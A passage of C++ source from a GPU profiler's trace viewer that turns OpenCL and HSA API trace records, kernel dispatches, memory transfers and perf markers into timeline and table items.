unsigned int dispSequenceId = pApiInfo->GetApiDisplaySequenceId();
if (apiID == CL_FUNC_TYPE_clGetEventInfo)
{
// don't assign an apiIndex to clGetEventInfo
        pAPITimelineItem = new CLGetEventInfoTimelineItem(itemStartTime, itemEndTime, dispSequenceId); // TODO: verify that the tooltip shows the index as "after index XXX" correctly
}
else
{
pAPITimelineItem = new APITimelineItem(itemStartTime, itemEndTime, dispSequenceId);
}
pAPITimelineItem->setText(apiName);
pAPITimelineItem->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
pAPITimelineItem->setForegroundColor(Qt::white);
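    // Enqueue APIs additionally produce a device-side timeline item (kernel execution, data transfer or other enqueue operation) in the matching queue branch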
CLAPIType apiType = pClApiInfo->GetCLApiType();
if ((apiType & CL_ENQUEUE_BASE_API) == CL_ENQUEUE_BASE_API) // this is an enqueue api
{
        ICLEnqueueApiInfoDataHandler* enqueueApiInfo = nullptr;
pClApiInfo->IsCLEnqueueAPI(&enqueueApiInfo);
GT_IF_WITH_ASSERT(enqueueApiInfo != nullptr)
{
unsigned int cmdType = enqueueApiInfo->GetCLCommandTypeEnum();
QString strCmdType = QString::fromStdString(enqueueApiInfo->GetCLCommandTypeString());
quint64 gpuStart = enqueueApiInfo->GetCLRunningTimestamp();
quint64 gpuEnd = enqueueApiInfo->GetCLCompleteTimestamp();
quint64 gpuQueued = enqueueApiInfo->GetCLQueueTimestamp();
quint64 gpuSubmit = enqueueApiInfo->GetCLSubmitTimestamp();
QString strQueueHandle = QString::fromStdString(enqueueApiInfo->GetCLCommandQueueHandleString());
unsigned int queueId = enqueueApiInfo->GetCLQueueId();
QString strContextHandle = QString::fromStdString(enqueueApiInfo->GetCLContextHandleString());
unsigned int contextId = enqueueApiInfo->GetCLContextId();
QString deviceNameStr = QString::fromStdString(enqueueApiInfo->GetCLDeviceNameString());
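            // Occupancy records for this thread are matched to kernel dispatches via a running per-thread index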
int nOccIndex = 0;
if (m_oclThreadOccIndexMap.contains(threadId))
{
nOccIndex = m_oclThreadOccIndexMap[threadId];
}
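            // Skip device items whose GPU timestamps are invalid or out of order (map/unmap APIs may legitimately report an end time earlier than the start time)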
if ((gpuEnd < gpuStart && (apiID < CL_FUNC_TYPE_clEnqueueMapBuffer || apiID > CL_FUNC_TYPE_clEnqueueUnmapMemObject)) || gpuStart < gpuSubmit || gpuSubmit < gpuQueued)
{
if (cmdType <= CL_COMMAND_TASK && (deviceNameStr != GPU_STR_TraceViewCpuDevice))
{
// if this is a kernel dispatch without valid timestamps, on a non-CPU device, then bump the
// occIndex so that subsequent dispatches are matched up with the correct occupancy info
// This fixes BUG355468
nOccIndex++;
}
}
else
{
// Get or create the branch for this queue:
OCLQueueBranchInfo* pBranchInfo = GetBranchInfo(contextId, queueId, strContextHandle, deviceNameStr, strQueueHandle);
if ((apiType & CL_ENQUEUE_KERNEL) == CL_ENQUEUE_KERNEL) // TODO does CL_COMMAND_NATIVE_KERNEL need special handling here????
{
                    ICLKernelApiInfoDataHandler* kernelApiInfo = nullptr;
pClApiInfo->IsCLKernelApiInfo(&kernelApiInfo);
GT_IF_WITH_ASSERT((kernelApiInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
CLKernelTimelineItem* gpuItem = new CLKernelTimelineItem(gpuStart, gpuEnd, displaySeqId);
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = gpuItem;
m_lastDeviceItemIdx = pApiInfo->m_uiSeqID;
#endif
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setText(QString::fromStdString(kernelApiInfo->GetCLKernelNameString()));
gpuItem->setGlobalWorkSize(QString::fromStdString(kernelApiInfo->GetCLKernelGlobalWorkGroupSize()));
gpuItem->setLocalWorkSize(QString::fromStdString(kernelApiInfo->GetCLKernelWorkGroupSize()));
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
deviceBlockItem = gpuItem;
if (m_pCurrentSession->LoadAndGetOccupancyTable().contains(threadId))
{
const QList<const IOccupancyInfoDataHandler*> occupancyInfosList = m_pCurrentSession->GetOccupancyTable()[threadId];
if (m_oclThreadOccIndexMap.contains(threadId))
{
nOccIndex = m_oclThreadOccIndexMap[threadId];
}
if (nOccIndex < occupancyInfosList.count())
{
std::string tempString(occupancyInfosList[nOccIndex]->GetDeviceName());
QString deviceName = QString::fromStdString(tempString);
if (Util::CheckOccupancyDeviceName(deviceName, deviceNameStr))
{
occupancyInfo = const_cast<IOccupancyInfoDataHandler*>(occupancyInfosList[nOccIndex]);
gpuItem->setOccupancyInfo(occupancyInfo);
nOccIndex++;
}
}
}
m_oclThreadOccIndexMap[threadId] = nOccIndex;
pBranchInfo->m_pKernelBranch->addTimelineItem(gpuItem);
}
}
else if ((apiType & CL_ENQUEUE_MEM) == CL_ENQUEUE_MEM)
{
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
                    ICLMemApiInfoDataHandler* memApiInfo = nullptr;
pClApiInfo->IsCLMemoryApiInfo(&memApiInfo);
GT_IF_WITH_ASSERT((memApiInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pMemoryBranch != nullptr))
{
CLAPITimelineItem* gpuItem = nullptr;
//if ((cmdType >= CL_COMMAND_READ_BUFFER && cmdType <= CL_COMMAND_MAP_IMAGE) || (cmdType >= CL_COMMAND_READ_BUFFER_RECT && cmdType <= CL_COMMAND_COPY_BUFFER_RECT))
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
gpuItem = new CLMemTimelineItem(gpuStart, gpuEnd, displaySeqId);
quint64 transferSize;
unsigned int uiTransferSize = memApiInfo->GetCLMemoryTransferSize();
transferSize = static_cast<quint64>(uiTransferSize);
(reinterpret_cast<CLMemTimelineItem*>(gpuItem))->setDataTransferSize(transferSize);
gpuItem->setText(CLMemTimelineItem::getDataSizeString(transferSize, 1) + " " + strCmdType.mid(11));
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
pBranchInfo->m_pMemoryBranch->addTimelineItem(gpuItem);
deviceBlockItem = gpuItem;
}
}
else if ((apiType & CL_ENQUEUE_OTHER_OPERATIONS) == CL_ENQUEUE_OTHER_OPERATIONS)
{
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
                    ICLOtherEnqueueApiInfoDataHandler* pOtherEnqueueOperationsInfo = nullptr;
pClApiInfo->IsCLEnqueueOtherOperations(&pOtherEnqueueOperationsInfo);
GT_IF_WITH_ASSERT((pOtherEnqueueOperationsInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
CLAPITimelineItem* gpuItem = nullptr;
quint64 startTime = enqueueApiInfo->GetCLRunningTimestamp();
quint64 endTime = enqueueApiInfo->GetCLCompleteTimestamp();
// Prepare the command name:
QString commandName = strCmdType.replace("CL_COMMAND_", "");
if ((apiType & CL_ENQUEUE_DATA_OPERATIONS) == CL_ENQUEUE_DATA_OPERATIONS)
{
// if (cmdType == CL_COMMAND_FILL_IMAGE) || (cmdType == CL_COMMAND_FILL_BUFFER)) || (cmdType == CL_COMMAND_SVM_MAP) || cmdType == CL_COMMAND_SVM_UNMAP)
unsigned int displaySeqId = pApiInfo->GetApiDisplaySequenceId();
gpuItem = new CLDataEnqueueOperationsTimelineItem(startTime, endTime, displaySeqId);
                            ICLDataEnqueueApiInfoDataHandler* pDataEnqueueOperationsInfo = nullptr;
pClApiInfo->IsCLDataEnqueueApi(&pDataEnqueueOperationsInfo);
GT_IF_WITH_ASSERT((pDataEnqueueOperationsInfo != nullptr) && (pBranchInfo != nullptr) && (pBranchInfo->m_pQueueBranch != nullptr))
{
quint64 dataSize = static_cast<quint64>(pDataEnqueueOperationsInfo->GetCLDataTransferSize());
static_cast<CLDataEnqueueOperationsTimelineItem*>(gpuItem)->setDataSize(dataSize);
commandName.prepend(CLMemTimelineItem::getDataSizeString(dataSize, 1) + " ");
}
}
else
{
gpuItem = new CLOtherEnqueueOperationsTimelineItem(startTime, endTime, pApiInfo->GetApiDisplaySequenceId());
}
APITimelineItem* newItem = new DispatchAPITimelineItem(gpuItem, pAPITimelineItem);
gpuItem->setText(commandName);
SAFE_DELETE(pAPITimelineItem);
pAPITimelineItem = newItem;
gpuItem->setBackgroundColor(pAPITimelineItem->backgroundColor());
gpuItem->setForegroundColor(Qt::white);
gpuItem->setQueueTime(gpuQueued);
gpuItem->setSubmitTime(gpuSubmit);
gpuItem->setDeviceType(deviceNameStr);
gpuItem->setCommandType(strCmdType);
gpuItem->setHostItem(pAPITimelineItem);
if (pBranchInfo->m_pFillOperationBranch == nullptr)
{
pBranchInfo->m_pFillOperationBranch = new acTimelineBranch();
pBranchInfo->m_pFillOperationBranch->setText(tr("Other Enqueue Operations"));
pBranchInfo->m_pFillOperationBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
pBranchInfo->m_pQueueBranch->addSubBranch(pBranchInfo->m_pFillOperationBranch);
}
GT_IF_WITH_ASSERT(pBranchInfo->m_pFillOperationBranch != nullptr)
{
pBranchInfo->m_pFillOperationBranch->addTimelineItem(gpuItem);
}
deviceBlockItem = gpuItem;
}
}
}
}
}
if (pAPITimelineItem != nullptr)
{
hostBranch->addTimelineItem(pAPITimelineItem);
pAPITimelineItem->setTraceTableItem(tableModel->AddTopLevelTraceItem(GPU_STR_TraceViewOpenCL, apiName, pApiInfo, pAPITimelineItem, deviceBlockItem, occupancyInfo));
}
}
void TraceView::HandleHSAAPIInfo(IHSAAPIInfoDataHandler* phsaApiInfo)
{
IAPIInfoDataHandler* pApiInfo = phsaApiInfo->GetApiInfoDataHandler();
HSA_API_Type apiID = phsaApiInfo->GetHSAApiTypeId();
osThreadId threadId = pApiInfo->GetApiThreadId();
if (phsaApiInfo->IsApi())
{
TraceTableModel* tableModel = nullptr;
acTimelineItem* deviceBlockItem = nullptr;
IOccupancyInfoDataHandler* occupancyInfo = nullptr;
AGP_TODO("hook up occupancy info for HSA");
//QList<OccupancyInfo*> occInfo;
// int nOccIndex = 0;
//if (m_pCurrentSession->GetOccupancyTable().contains(threadId))
//{
// occInfo = m_pCurrentSession->GetOccupancyTable()[threadId];
// if (m_hsaThreadOccIndexMap.contains(threadId))
// {
// nOccIndex = m_hsaThreadOccIndexMap[threadId];
// }
//}
// if we already have CL data for this thread, then insert the HSA data as sub-nodes under the containing CL node, otherwise create a table map for HSA
if (m_modelMap.contains(threadId))
{
tableModel = m_modelMap[threadId];
}
else
{
tableModel = new TraceTableModel(this);
tableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, tableModel);
}
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, GPU_STR_TraceViewHSA);
GT_ASSERT(hostBranch != nullptr);
QString apiName;
if (apiID < HSA_API_Type_Init)
{
//apiName = CLAPIDefs::Instance()->GetOpenCLAPIString(CL_FUNC_TYPE(apiID)); //TODO : add a HSA version....
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
else
{
apiName = QString::fromStdString(pApiInfo->GetApiNameString());
}
quint64 itemStartTime = pApiInfo->GetApiStartTime();
quint64 itemEndTime = pApiInfo->GetApiEndTime();
// check for reasonable timestamps
GT_ASSERT((itemEndTime >= itemStartTime) && itemStartTime != 0);
APITimelineItem* item = nullptr;
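        // HSA memory APIs get a dedicated timeline item; memory-transfer APIs additionally get an item in the HSA data-transfer branch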
        IHSAMemoryApiInfoDataHandler* pHsaMemoryAPIInfo = nullptr;
phsaApiInfo->IsHSAMemoryApi(&pHsaMemoryAPIInfo);
if (nullptr != pHsaMemoryAPIInfo)
{
unsigned int dispSeqId = pApiInfo->GetApiDisplaySequenceId();
size_t hsaMemorySize = pHsaMemoryAPIInfo->GetHSAMemoryApiSize();
item = new HSAMemoryTimelineItem(itemStartTime, itemEndTime, dispSeqId, hsaMemorySize);
            IHSAMemoryTransferApiInfoDataHandler* pHsaMemoryTransferAPIInfo = nullptr;
phsaApiInfo->IsHSAMemoryTransferApi(&pHsaMemoryTransferAPIInfo);
uint64_t hsaTransferStartTime = 0;
uint64_t hsaTransferEndTime = 0;
if (nullptr != pHsaMemoryTransferAPIInfo)
{
hsaTransferStartTime = pHsaMemoryTransferAPIInfo->GetHSAMemoryTransferStartTime();
hsaTransferEndTime = pHsaMemoryTransferAPIInfo->GetHSAMemoryTransferEndTime();
}
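            // Helper lambda: strip the surrounding braces from an agent descriptor string and extract the agent handle and agent name values (falling back to "Unknown" when no name is present)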
            auto SplitAgentHandleAndName = [](const std::string& agentString, std::string& agentHandle, std::string& agentName)
{
std::string agentStringWithoutBraces = std::string(agentString.begin() + 1, agentString.end() - 1);
size_t agentHandleNameSeparatorPos = agentStringWithoutBraces.find(",");
if (std::string::npos != agentHandleNameSeparatorPos)
{
agentHandle = std::string(agentStringWithoutBraces.begin(), agentStringWithoutBraces.begin() + agentHandleNameSeparatorPos);
size_t nameValueseparatorPos = agentHandle.find(ATP_PARAM_VALUE_DELIMITER);
agentHandle = std::string(agentHandle.begin() + nameValueseparatorPos + 1, agentHandle.end());
agentName = std::string(agentStringWithoutBraces.begin() + agentHandleNameSeparatorPos + 1, agentStringWithoutBraces.end());
nameValueseparatorPos = agentName.find(ATP_PARAM_VALUE_DELIMITER);
agentName = std::string(agentName.begin() + nameValueseparatorPos + 1, agentName.end());
}
else
{
agentHandle = agentStringWithoutBraces;
agentName = "Unknown";
}
};
if ((nullptr != pHsaMemoryTransferAPIInfo) && (0 != hsaTransferStartTime) && (0 != hsaTransferEndTime))
{
std::string agentHandle;
std::string agentName;
std::string agentString = pHsaMemoryTransferAPIInfo->GetHSASrcAgentString();
SplitAgentHandleAndName(agentString, agentHandle, agentName);
QString srcAgentHandle = QString::fromStdString(agentHandle);
QString srcAgentName = QString::fromStdString(agentName);
agentString = pHsaMemoryTransferAPIInfo->GetHSADestinationAgentString();
SplitAgentHandleAndName(agentString, agentHandle, agentName);
QString dstAgentHandle = QString::fromStdString(agentHandle);
QString dstAgentName = QString::fromStdString(agentName);
HSAMemoryTransferTimelineItem* transferItem = new HSAMemoryTransferTimelineItem(
hsaTransferStartTime,
hsaTransferEndTime,
dispSeqId,
hsaMemorySize,
srcAgentHandle,
srcAgentName,
dstAgentHandle,
dstAgentName);
transferItem->setHostItem(item);
transferItem->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
quint64 transferSize = hsaMemorySize;
//((CLMemTimelineItem*)gpuItem)->setDataTransferSize(transferSize);
transferItem->setText(CLMemTimelineItem::getDataSizeString(transferSize, 1) + " copy");
// Create HSA branch if it does not yet exist
if (nullptr == m_pHSABranch)
{
m_pHSABranch = new acTimelineBranch();
m_pHSABranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSABranch->setText(GPU_STR_TraceViewHSA);
}
if (nullptr == m_pHSADataTransferBranch)
{
m_pHSADataTransferBranch = new acTimelineBranch();
m_pHSADataTransferBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSADataTransferBranch->setText(GPU_STR_TraceViewHSADataTransfers);
}
acTimelineBranch* pHsaDataTransferBranch = GetHSADataTransferBranch(srcAgentHandle, dstAgentHandle);
if (nullptr == pHsaDataTransferBranch)
{
pHsaDataTransferBranch = AddHSADataTransferBranch(srcAgentHandle, srcAgentName, dstAgentHandle, dstAgentName);
}
pHsaDataTransferBranch->addTimelineItem(transferItem);
}
}
else
{
unsigned int dispSeqId = pApiInfo->GetApiDisplaySequenceId();
item = new APITimelineItem(itemStartTime, itemEndTime, dispSeqId);
}
if (nullptr != item)
{
item->setText(apiName);
item->setBackgroundColor(APIColorMap::Instance()->GetAPIColor(apiName, QColor(90, 90, 90)));
item->setForegroundColor(Qt::white);
hostBranch->addTimelineItem(item);
            item->setTraceTableItem(tableModel->AddTraceItem(GPU_STR_TraceViewHSA, apiName, pApiInfo, item, deviceBlockItem, occupancyInfo));
        }
}
else if (HSA_API_Type_Non_API_Dispatch == apiID)
{
        IHSADispatchApiInfoDataHandler* dispatchInfo = nullptr;
phsaApiInfo->IsHSADispatchApi(&dispatchInfo);
if (dispatchInfo != nullptr)
{
quint64 gpuStart = pApiInfo->GetApiStartTime();
quint64 gpuEnd = pApiInfo->GetApiEndTime();
QString kernelNameStr = QString::fromStdString(dispatchInfo->GetHSAKernelName());
QString deviceNameStr = QString::fromStdString(dispatchInfo->GetHSADeviceName());
if ((gpuEnd < gpuStart))
{
                AGP_TODO("FIXME the commented out bit in the if statement");
//if (cmdType <= CL_COMMAND_TASK && (deviceNameStr != GPU_STR_TraceViewCpuDevice))
{
// if this is a kernel dispatch without valid timestamps, on a non-CPU device, then bump the
// occIndex so that subsequent dispatches are matched up with the correct occupancy info
// This fixes BUG355468
//nOccIndex++;
}
}
else
{
// setup a device row based on deviceNameStr OR m_strQueueHandle ??
acTimelineBranch* deviceBranch = nullptr;
// Create HSA branch if it does not yet exist
if (m_pHSABranch == nullptr)
{
m_pHSABranch = new acTimelineBranch();
m_pHSABranch->SetBGColor(QColor::fromRgb(230, 230, 230));
m_pHSABranch->setText(GPU_STR_TraceViewHSA);
}
unsigned int hsaQueueIndex = dispatchInfo->GetHSAQueueIndex();
if (m_hsaQueueMap.contains(hsaQueueIndex))
{
deviceBranch = m_hsaQueueMap[hsaQueueIndex];
}
else
{
deviceBranch = new acTimelineBranch();
deviceBranch->SetBGColor(QColor::fromRgb(230, 230, 230));
QString deviceIndexStr = dispatchInfo->GetHSAQueueHandleString(); // "GetHSAQueueHandleString" is a misnomer. This function returns the device index
QString queueBranchText = QString(tr(GPU_STR_HSATraceViewQueueRow)).arg(hsaQueueIndex).arg(deviceIndexStr).arg(deviceNameStr);
deviceBranch->setText(queueBranchText);
m_hsaQueueMap[hsaQueueIndex] = deviceBranch;
}
unsigned int uiSeqId = pApiInfo->GetApiSequenceId();
HSADispatchTimelineItem* dispatchItem = new HSADispatchTimelineItem(gpuStart, gpuEnd, uiSeqId);
dispatchItem->setText(kernelNameStr);
dispatchItem->setGlobalWorkSize(QString::fromStdString(dispatchInfo->GetHSAGlobalWorkGroupSize()));
dispatchItem->setLocalWorkSize(QString::fromStdString(dispatchInfo->GetHSAWorkGroupSizeString()));
//dispatchItem->setOffset(QString::fromStdString(dispatchInfo->m_strOffset));
dispatchItem->setDeviceType(deviceNameStr);
dispatchItem->setQueueHandle(QString::fromStdString(dispatchInfo->GetHSAQueueHandleString()));
dispatchItem->setBackgroundColor(Qt::darkGreen);
dispatchItem->setForegroundColor(Qt::white);
//dispatchItem->setHostItem(item);
dispatchItem->setHostItem(nullptr);
AGP_TODO("hook up occupancy info for HSA");
//if ((nOccIndex < occInfo.count()) && Util::CheckOccupancyDeviceName(occInfo[nOccIndex]->GetDeviceName(), deviceNameStr))
//{
// occupancyInfo = occInfo[nOccIndex];
// dispatchItem->setOccupancyInfo(occupancyInfo);
// nOccIndex++;
//}
//m_hsaThreadOccIndexMap[threadId] = nOccIndex;
deviceBranch->addTimelineItem(dispatchItem);
}
}
}
}
void TraceView::HandleSymFileEntry(ISymbolFileEntryInfoDataHandler* pSymFileEntry)
{
GT_IF_WITH_ASSERT(pSymFileEntry != nullptr)
{
osThreadId threadId = pSymFileEntry->GetsymbolThreadId();
SymbolInfo* entry = nullptr;
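        // A stack entry with a valid source file and line number yields a populated SymbolInfo; otherwise an empty placeholder entry is stored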
if (!pSymFileEntry->IsStackEntryNull())
{
IStackEntryInfoDataHandler* pStackEntryInfoHandler = pSymFileEntry->GetStackEntryInfoHandler();
LineNum lineNumber = pStackEntryInfoHandler->GetLineNumber();
std::string fileName = pStackEntryInfoHandler->GetFileNameString();
if (lineNumber != static_cast<LineNum>(-1) && !fileName.empty())
{
                std::string apiName = pSymFileEntry->GetSymbolApiName();
                std::string symbolName = pStackEntryInfoHandler->GetSymbolNameString();
entry = new SymbolInfo(QString::fromStdString(apiName),
QString::fromStdString(symbolName),
QString::fromStdString(fileName),
lineNumber);
}
else
{
entry = new SymbolInfo;
}
}
else
{
entry = new SymbolInfo;
}
if (m_symbolTableMap.contains(threadId))
{
m_symbolTableMap[threadId].append(entry);
}
else
{
QList<SymbolInfo*> list;
list.append(entry);
m_symbolTableMap.insert(threadId, list);
}
}
}
acTimelineBranch* TraceView::GetPerfMarkerSubBranchHelper(const QString& name, acTimelineBranch* pParent)
{
acTimelineBranch* ret = nullptr;
GT_IF_WITH_ASSERT(pParent)
{
for (int i = 0; i < pParent->subBranchCount(); ++i)
{
acTimelineBranch* pb = pParent->getSubBranch(i);
if (pb->text() == name)
{
ret = pb;
}
}
if (ret == nullptr)
{
// Create a new branch for the added perf marker
ret = new(std::nothrow) acTimelineBranch();
ret->setParent(pParent);
ret->setText(name);
pParent->addSubBranch(ret);
}
}
return ret;
}
void TraceView::HandlePerfMarkerEntry(IPerfMarkerInfoDataHandler* pPerfMarkerEntry)
{
m_perfMarkersAdded = true;
osThreadId threadId = pPerfMarkerEntry->GetPerfMarkerThreadId();
TraceTableModel* pTableModel = nullptr;
acTimelineBranch* hostBranch = GetHostBranchForAPI(threadId, "");
GT_ASSERT(hostBranch != nullptr);
if (m_modelMap.contains(threadId))
{
pTableModel = m_modelMap[threadId];
}
else
{
pTableModel = new TraceTableModel(this);
pTableModel->SetVisualProperties(palette().color(QPalette::Text), palette().color(QPalette::Link), font());
m_modelMap.insert(threadId, pTableModel);
}
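    // Perf markers nest: a Begin entry pushes onto the branch/title/timestamp stacks, an End/EndEx entry pops them and creates the timeline item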
unsigned long long startTime = 0;
unsigned long long endTime = 0;
    IPerfMarkerBeginInfoDataHandler* pBeginMarkerEntry = nullptr;
if (pPerfMarkerEntry->IsBeginPerfMarkerEntry(&pBeginMarkerEntry))
{
GT_IF_WITH_ASSERT(pBeginMarkerEntry != nullptr)
{
if (m_branchStack.count() > 0)
{
hostBranch = m_branchStack.top();
}
std::string markerGroup = pBeginMarkerEntry->GetPerfMarkerBeginInfoGroupName();
acTimelineBranch* branchToUse = GetPerfMarkerSubBranchHelper(QString::fromStdString(markerGroup), hostBranch);
if (branchToUse != hostBranch)
{
m_branchStack.push(branchToUse);
}
std::string markerName = pBeginMarkerEntry->GetPerfMarkerBeginInfoName();
m_titleStack.push(QString::fromStdString(markerName));
unsigned long long markerTimestamp = pPerfMarkerEntry->GetPerfMarkerTimestamp();
m_timestampStack.push(markerTimestamp);
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->AddTraceItem("Perf Marker", QString::fromStdString(markerName), pPerfMarkerEntry);
GT_ASSERT(pTableItem != nullptr);
}
}
else if (pPerfMarkerEntry->IsEndPerfMarkerEntry())
{
if (m_timestampStack.isEmpty())
{
Util::LogError("Invalid input perfmarker file");
return;
}
startTime = m_timestampStack.pop();
endTime = pPerfMarkerEntry->GetPerfMarkerTimestamp();
// Create the new time line item:
PerfMarkerTimelineItem* pNewItem = new PerfMarkerTimelineItem(startTime, endTime);
// Set the font and color for the perf marker item:
pNewItem->setBackgroundColor(APIColorMap::Instance()->GetPerfMarkersColor());
pNewItem->setForegroundColor(Qt::black);
pNewItem->setText(m_titleStack.pop());
// Add the timeline item to the branch:
GT_IF_WITH_ASSERT(m_branchStack.count() > 0)
{
acTimelineBranch* currentBranch = m_branchStack.pop();
currentBranch->addTimelineItem(pNewItem);
}
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->CloseLastOpenedPerfMarker(pNewItem);
GT_IF_WITH_ASSERT(pTableItem != nullptr)
{
pNewItem->setTraceTableItem(pTableItem);
}
}
else if (pPerfMarkerEntry->IsEndExPerfMarkerEntry())
{
if (m_timestampStack.isEmpty())
{
Util::LogError("Invalid input perfmarker file");
return;
}
        IPerfMarkerEndExInfoDataHandler* pEndExMarkerEntry = nullptr;
pPerfMarkerEntry->IsEndExPerfMarkerEntry(&pEndExMarkerEntry);
startTime = m_timestampStack.pop();
endTime = pPerfMarkerEntry->GetPerfMarkerTimestamp();
// Create the new time line item:
PerfMarkerTimelineItem* pNewItem = new PerfMarkerTimelineItem(startTime, endTime);
// Set the font and color for the perf marker item:
pNewItem->setBackgroundColor(APIColorMap::Instance()->GetPerfMarkersColor());
pNewItem->setForegroundColor(Qt::black);
std::string markerName = pEndExMarkerEntry->GetPerfMarkerEndExName();
pNewItem->setText(QString::fromStdString(markerName));
// Remove the title that was specified from the BeginPerfMarker call
m_titleStack.pop();
// Add the timeline item to the branch:
GT_IF_WITH_ASSERT(m_branchStack.count() > 0)
{
acTimelineBranch* currentBranch = m_branchStack.pop();
if (m_branchStack.count() > 0)
{
hostBranch = m_branchStack.top();
}
std::string markerGroup = pEndExMarkerEntry->GetPerfMarkerEndExGroupName();
currentBranch = GetPerfMarkerSubBranchHelper(QString::fromStdString(markerGroup), hostBranch);
currentBranch->addTimelineItem(pNewItem);
}
// Add an item to the table:
TraceTableItem* pTableItem = pTableModel->CloseLastOpenedPerfMarker(pNewItem);
GT_IF_WITH_ASSERT(pTableItem != nullptr)
{
pNewItem->setTraceTableItem(pTableItem);
}
}
}
void TraceView::DoneParsingATPFile()
{
bool timelineDataLoaded = false;
bool traceDataLoaded = false;
m_parseCallsCounter = 0;
afApplicationCommands::instance()->EndPerformancePrintout("Parsing trace file");
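    // Assemble the final timeline: host thread branches first, then OpenCL context/queue branches, then HSA queues and data-transfer branches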
if (!m_hostBranchMap.isEmpty())
{
timelineDataLoaded = true;
acTimelineBranch* hostBranch = new acTimelineBranch();
hostBranch->setText(tr("Host"));
for (QMap<osThreadId, acTimelineBranch*>::const_iterator i = m_hostBranchMap.begin(); i != m_hostBranchMap.end(); ++i)
{
hostBranch->addSubBranch(*i);
}
m_pTimeline->addBranch(hostBranch);
m_hostBranchMap.clear();
}
if (!m_oclCtxMap.isEmpty())
{
timelineDataLoaded = true;
for (QMap<unsigned int, acTimelineBranch*>::const_iterator i = m_oclCtxMap.begin(); i != m_oclCtxMap.end(); ++i)
{
m_pOpenCLBranch->addSubBranch(*i);
}
m_pTimeline->addBranch(m_pOpenCLBranch);
m_oclCtxMap.clear();
}
if (!m_oclQueueMap.isEmpty())
{
timelineDataLoaded = true;
for (QMap<unsigned int, OCLQueueBranchInfo*>::iterator i = m_oclQueueMap.begin(); i != m_oclQueueMap.end(); ++i)
{
SAFE_DELETE(*i);
}
m_oclQueueMap.clear();
}
if (!m_hsaQueueMap.isEmpty() || nullptr != m_pHSADataTransferBranch)
{
timelineDataLoaded = true;
bool anySubBranchAdded = false;
for (QMap<unsigned int, acTimelineBranch*>::const_iterator i = m_hsaQueueMap.begin(); i != m_hsaQueueMap.end(); ++i)
{
m_pHSABranch->addSubBranch(*i);
anySubBranchAdded = true;
}
if (nullptr != m_pHSADataTransferBranch)
{
m_pHSABranch->addSubBranch(m_pHSADataTransferBranch);
anySubBranchAdded = true;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
m_pHSADataTransferBranch->addSubBranch(it->m_pTransferBranch);
}
}
if (anySubBranchAdded)
{
m_pTimeline->addBranch(m_pHSABranch);
}
m_hsaQueueMap.clear();
}
if (!m_modelMap.isEmpty())
{
traceDataLoaded = true;
for (QMap<osThreadId, TraceTableModel*>::const_iterator i = m_modelMap.begin(); i != m_modelMap.end(); ++i)
{
AddTraceTable(*i, i.key());
}
m_modelMap.clear();
}
if (!timelineDataLoaded)
{
if (!traceDataLoaded)
{
SAFE_DELETE(m_pSessionTabWidget);
            // Deleting m_pSessionTabWidget also destroys its dependent child widgets, so just reset their pointers
m_pMainSplitter = nullptr;
m_pTraceTabView = nullptr;
m_pTimeline = nullptr;
QString strError = "An error occurred when loading the Application Trace.";
QStringList excludedAPIs;
if (m_pCurrentSession->GetExcludedAPIs(excludedAPIs))
{
strError += QString(GP_Str_AppMadeNoCallsToEnabledAPI).arg(GP_Str_AppTraceAPIToTrace).arg(Util::ms_APP_TRACE_OPTIONS_PAGE);
}
QLabel* badDataLabel = new QLabel(strError);
GT_ASSERT(badDataLabel);
badDataLabel->setAlignment(Qt::AlignCenter);
m_pMainLayout->addWidget(badDataLabel);
m_pMainLayout->setContentsMargins(0, 0, 0, 0);
}
else
{
Util::ShowErrorBox(QString(GP_Str_UnableToLoadTimelineData).arg(Util::ms_ENABLE_TIMEOUT_OPTION));
}
}
}
int TraceView::GetTabIndex(const QString& strTabText)
{
int retVal = -1;
for (int tabIndex = 0; tabIndex < m_pTraceTabView->count(); tabIndex++)
{
if (m_pTraceTabView->tabText(tabIndex) == strTabText)
{
retVal = tabIndex;
break;
}
}
return retVal;
}
void TraceView::DisplaySummaryPageType(int selectedIndex)
{
